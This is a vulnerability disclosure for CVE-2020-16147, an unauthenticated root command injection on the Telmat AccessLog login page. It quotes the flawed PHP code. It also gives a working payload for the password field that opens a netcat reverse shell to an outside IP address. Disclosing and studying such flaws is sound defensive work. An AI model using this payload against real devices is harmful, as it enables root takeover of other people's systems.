CVE-2020-16147 - Telmat - Unauthenticated root RCE
- Title : Telmat - Unauthenticated root Remote Code Execution
- Author : @podalirius_
- CVSS : 10 (Critical)
- CVSS Vector :
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Summary
An unauthenticated code injection on the login page of Telmat AccessLog, Gît@Box and Educ@Box with software version <= 6.0 (TAL_20180415) allows Remote Code Execution (RCE) as root.
Affected products
| Manufacturer | Model | Software version |
|---|---|---|
| TelMat | AccessLog | <= 6.0 (TAL_20180415) |
| TelMat | Educ@Box | <= 6.0 (TAL_20180415) |
| TelMat | Gît@Box | <= 6.0 (TAL_20180415) |
Exploitation
This vulnerability was tested on a Telmat AccessLog 6.0 (TAL_20180415):
During a pentest, I found the login page of the AccessLog. I tried to perform SQL injections on the login and password fields to bypass the authentication mechanism. I noticed that the login page had an unexpected behavior when the password contained a single quote '. The login page was replaced by a progress bar for about 10 to 15 minutes for all clients. (This could lead to a denial of service)
Using the Authenticated RCE I found earlier, I extracted the contents of the login page /authent.php. After analyzing how the authentication mechanism works, I found this interesting part (lines 56 to 72 in file /authent.php) :
if(isset($cpasswd)) {
unset($res);
if(strstr($cpasswd,"$apr1$")) {
$dpsd = explode("$",$cpasswd);
$salt = $dpsd[2];
$cmd = "/usr/bin/openssl passwd -apr1 -salt '" . $salt . "' '" . $_POST['whois_pas'] . "'";
exec($cmd,$res,$cr);
$ccpasswd = trim($res[0]);
} else {
$salt = mb_substr($cpasswd,0,2);
$cmd = "/usr/bin/openssl passwd -crypt -salt '" . $salt . "' '" . $_POST['whois_pas'] . "'";
exec($cmd,$res,$cr);
$ccpasswd = trim($res[0]);
}
// ...
}
We can see that the content of the whois_pas variable in the POST request is appended directly to the command line, unfiltered. We now only need to close the single quote ' and add a semicolon ; and we can inject shell commands directly. At the end of our injection, we add a # in order to comment out the rest of the command line.
Proof of concept reverse shell :
In order to get a reverse shell I used the following payload :
| Name | Content |
|---|---|
Login (whois_adm) |
poc |
Password (whois_pas) |
'; nc -e /bin/sh 1.2.3.4 4444 # |
We now have an unauthenticated RCE, furthermore also running as root :
Mitigations
In order to patch this vulnerability you need to update your firmware to the latest version.